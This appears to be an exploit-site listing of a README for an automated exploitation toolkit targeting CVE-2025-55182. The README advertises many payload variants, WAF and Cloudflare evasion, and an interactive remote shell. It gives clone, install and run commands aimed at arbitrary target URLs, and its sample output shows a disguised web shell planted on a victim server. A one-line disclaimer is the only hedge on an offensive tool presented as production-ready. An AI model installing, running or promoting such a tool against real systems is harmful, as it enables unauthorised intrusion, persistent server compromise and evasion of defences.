Share
## https://sploitus.com/exploit?id=4776C72F-A01A-50EC-9AF8-A443D1EAAB8F
# โก CVE-2025-55182 โ Auto Exploit Toolkit
### Precision Engineered Automated Exploitation Framework with 20+ Payload Variants, Cloudflare Bypass, and Interactive RCE Shell





---
## โจ Key Features
| Category | Highlights |
|---------|------------|
| Exploitation Engine | 20+ payload variants, automatic fallback, multi-stage attack chains |
| WAF/Cloudflare Bypass | Randomized headers, obfuscated payloads, signature evasion |
| Recon & Discovery | Smart crawler, fuzzer, domain normalizer |
| Adaptive Logic | Dynamic delay, randomized encoding |
| RCE Shell | Command execution, upload, env info |
| Reporting | JSON logs, endpoint tracking |
---
## Architecture (ASCII)
```
Target URL
โ
โโโโโโโโโโโโโโดโโโโโโโโโโโโโ
โผ โผ
Recon Engine Payload Generator
โ โ
โโโโโโโโโโโโโโฌโโโโโโโโโโโโโ
โผ
Exploit Delivery Core
โ
โโโโโโโโโโโโโโดโโโโโโโโโโโโโ
โผ โผ
Successful Exploit WAF Block โ Retry
โ
โผ
RCE Shell
โ
โผ
Reporting Engine
```
---
## ๐งฉ Project Structure
```
auto_exploit.py
payloads/
output/
shell/
```
---
## Installation
```bash
git clone https://github.com/hadipra5/CVE-2025-55182-Auto-Exploit-Toolkit.git
cd CVE-2025-55182-Auto-Exploit-Toolkit
pip install -r requirements.txt
```
---
## Usage
```bash
python3 auto_exploit.py https://target.com
python3 auto_exploit.py https://target.com/api/v1/upload
python3 auto_exploit.py https://target.com --json out.json
python3 auto_exploit.py https://target.com --debug
```
---
## Example Output
```json
{
"target": "https://victim.com",
"vulnerable": true,
"shell_url": "https://victim.com/cache/.sys_x92.php",
"successful_payloads": [
{
"variant": "OBFUSCATED_B64_09",
"status": 200,
"endpoint": "/api/v1/convert",
"evidence": "Command execution confirmed"
}
]
}
```
---
## Legal Disclaimer
Educational & authorized penetration testing only.
---
## ๐ Inspiration & Reference
This project was initially inspired by research shared publicly in the following post:
**Reference:**
https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3
The original gist provided foundational insights into the vulnerability mechanics and exploit behavior, which served as a baseline for extending, improving, and engineering a more advanced, production-ready automated exploitation toolkit.
All source code in this repository has been rewritten, expanded, and optimized to provide a more robust and research-oriented framework suitable for red-team labs and academic environments.
---
## Contributing
PRs welcome!